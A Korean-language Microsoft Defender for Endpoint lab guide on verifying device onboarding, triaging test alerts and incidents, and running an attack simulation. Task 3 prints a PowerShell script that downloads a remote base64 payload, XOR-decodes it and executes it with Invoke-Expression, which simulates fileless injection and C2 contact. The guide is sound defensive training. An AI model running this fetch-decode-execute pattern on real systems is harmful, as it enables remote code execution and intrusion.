학습 경로 2 - 랩 1 - 연습 2 - 엔드포인트용 Microsoft Defender를 사용하여 위협 완화

랩 시나리오

랩 개요입니다.

여러분은 엔드포인트용 Microsoft Defender를 구현하고 있는 회사에서 일하는 보안 운영 분석가입니다. 귀하의 관리자가 몇몇 디바이스를 온보딩하여 보안 운영(SecOps) 팀 응답 절차에 필요한 변경 내용에 대한 인사이트를 제공하려고 합니다.

엔드포인트용 Defender 공격 완화 기능을 탐색하려면 성공적인 디바이스 온보딩을 확인하고 해당 프로세스 중에 생성된 경고 및 인시던트를 조사합니다.

참고: 대화형 랩 시뮬레이션 을 사용하여 이 랩을 원하는 속도로 클릭할 수 있습니다. 대화형 시뮬레이션과 호스트된 랩 간에 약간의 차이가 있을 수 있지만 보여주는 핵심 개념과 아이디어는 동일합니다.

작업 1: 디바이스 온보딩 확인

이 작업에서는 디바이스가 성공적으로 온보딩되었는지 확인하고 테스트 경고를 만듭니다.

현재 위치가 Microsoft Edge 브라우저의 Microsoft Defender XDR 포털이 아닌 경우 https://security.microsoft.com)으로 이동하고 테넌트에 대한 관리자로 로그인합니다.
왼쪽 메뉴의 자산 영역에서 디바이스를 선택합니다. 계속하기 전에 WIN1이 디바이스 페이지에 나타날 때까지 기다려 주세요. 그렇지 않으면, 나중에 생성될 경고를 보기 위해 이 작업을 반복해야 할 수 있습니다.

참고: 온보딩 프로세스를 완료하고 한 시간 후에 디바이스 목록에 디바이스가 표시되지 않으면 온보딩 또는 연결 문제가 표시될 수 있습니다.
Microsoft Defender XDR 포털 왼쪽 메뉴 모음에서 시스템 섹션을 확장하고 설정을 선택한 다음, 설정 페이지에서 엔드포인트를 선택합니다.
디바이스 관리 섹션에서 온보딩을 선택하고 “Windows 10 및 11” 이 운영 체제로 선택되어 있는지 확인합니다. 이제 “온보딩된 첫 번째 디바이스” 메시지에 완료됨이 표시됩니다.
“2” 섹션에서 아래로 스크롤합니다. 검색 테스트 실행”, 복사 단추를 선택하여 검색 테스트 스크립트를 복사 합니다.
WIN1 가상 머신의 Windows 검색 창에서 CMD를 입력하고 명령 프롬프트 앱의 오른쪽 창에서 관리자 권한으로 실행을 선택합니다.
“사용자 계정 컨트롤” 창이 표시되면 예를 선택하여 앱을 실행할 수 있도록 합니다.
관리자: 명령 프롬프트 창을 마우스 오른쪽 단추로 클릭하여 스크립트를 붙여넣고 Enter 키를 눌러 실행합니다.

참고: 스크립트를 성공적으로 실행한 후 몇 분 후에 Microsoft Defender XDR 포털에서 경고가 생성되면 창이 자동으로 닫힙니다.

작업 2: 경고 및 인시던트 조사

이 작업에서는 이전 작업의 온보딩 검색 테스트 스크립트에서 생성된 경고 및 인시던트를 조사합니다.

Microsoft Defender XDR 포털의 왼쪽 메뉴 모음에서 조사 및 응답을 확장한 다음 인시던트 및 경고를 확장하고 경고를 선택합니다.

참고: 업데이트된 버전의 Microsoft Defender XDR 포털 페이지에서 인시던트 및 경고가 조사 및 응답 메뉴 제목 아래에 있습니다.
경고 창에서 [TestAlert]의심스러운 PowerShell 명령줄이라는 경고를 선택하여 세부 정보를 로드합니다.
경고 스토리 타임라인을 검토한 다음 세부 정보 및 권장 사항 탭을 검토합니다.

참고: 경고 세부 정보 탭에서 인시던트 세부 정보 섹션까지 아래로 스크롤하고 한 엔드포인트에서 실행 인시던트 링크를 선택하여 인시던트를 열 수 있습니다.
Microsoft Defender XDR 포털의 왼쪽 메뉴 모음에서 인시던트 및 경고를 선택한 다음, 인시던트를 선택합니다.
필터 오른쪽에서 X를 선택하여 경고 심각도 필터를 지웁합니다.
[TestAlert]의심스러운 PowerShell 명령줄이란 새 인시던트가 오른쪽 창에 나타납니다. 인시던트 이름을 선택하여 세부 정보를 로드합니다.
인시던트 관리 링크(연필 아이콘 포함)를 선택하면 새 창 블레이드가 나타납니다.
인시던트 태그 아래에서 “시뮬레이션”을 입력하고 시뮬레이션(새로 만들기) 를 선택하여 새 태그를 만듭니다.
내게 할당 토글을 선택하여 사용자 계정(Me)을 인시던트 소유자로 추가합니다.
분류 아래에서 드롭다운 메뉴를 확장합니다.
정보, 예상 작업에서 보안 테스트를 선택합니다.
원하는 경우 메모를 추가하고 저장을 선택하여 인시던트 업데이트 및 완료를 선택합니다.
공격 스토리, 경고, 자산, 조사, 증거 및 대응과 요약 탭의 내용을 검토합니다. 디바이스 및 사용자가 자산 탭 아래에 있습니다. 실제 인시던트에서 공격 스토리 탭에는 인시던트 그래프가 표시됩니다. 힌트: 일부 탭은 디스플레이 크기 때문에 숨겨질 수 있습니다. 줄임표 탭(…)을 선택하여 해당 탭을 표시합니다.

작업 3 공격 시뮬레이션

경고: 이 시뮬레이션된 공격은 연습을 통한 훌륭한 학습 소스입니다. Azure 테넌트에서 제공하는 과정을 사용할 때 이 랩에 제공된 지침의 지침에서만 공격을 수행합니다. 이 테넌트에서 이 교육 과정을 완료한 후에 다른 시뮬레이션된 공격을 수행할 수 있습니다.

이 작업에서는 WIN1 가상 머신에 대한 공격을 시뮬레이션하고 엔드포인트용 Microsoft Defender 공격이 감지되고 완화되는지 확인합니다.

WIN1 가상 머신에서 시작 단추를 마우스 오른쪽 단추로 클릭하고 Windows PowerShell(관리자) 을 선택합니다.
“사용자 계정 컨트롤” 창이 표시되면 예를 선택하여 앱을 실행할 수 있도록 합니다.
다음 시뮬레이션 스크립트를 복사하여 PowerShell 창에 붙여넣고 Enter 키를 눌러 실행합니다.
```
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 ;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');
 $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
 $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
 $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
```
참고: 스크립트를 실행하는 동안 오류(빨간색)가 발생하면 메모장 앱을 열고 스크립트를 빈 파일에 복사할 수 있습니다. 메모장에서 자동 줄 바꿈이 켜져 있는지 확인합니다. 그런 다음 PowerShell에서 스크립트의 각 줄을 개별적으로 복사하고 실행합니다. 또한 랩 시작 시 다운로드한 파일에 PowerShell 스크립트(attacksim.ps1)가 제공되었습니다. 스크립트를 사용하려면 Windows PowerShell(관리자) 에서 \Users\Admin\Desktop\Allfiles 폴더로 이동하여 .\attacksim.ps1을 입력하고 Enter 키를 눌러 실행합니다.
스크립트는 여러 줄의 출력과 도메인에서 도메인 컨트롤러를 확인하지 못함이라는 메시지를 생성합니다. 몇 초 후에 메모장 앱이 열립니다. 시뮬레이션된 공격 코드가 메모장에 삽입됩니다. 자동으로 생성된 메모장 인스턴스를 열어 두어 전체 시나리오를 경험해 보세요. 시뮬레이션된 공격 코드는 외부 IP 주소(C2 서버 시뮬레이션)와 통신을 시도합니다.

작업 4: 시뮬레이션된 공격을 단일 인시던트로 조사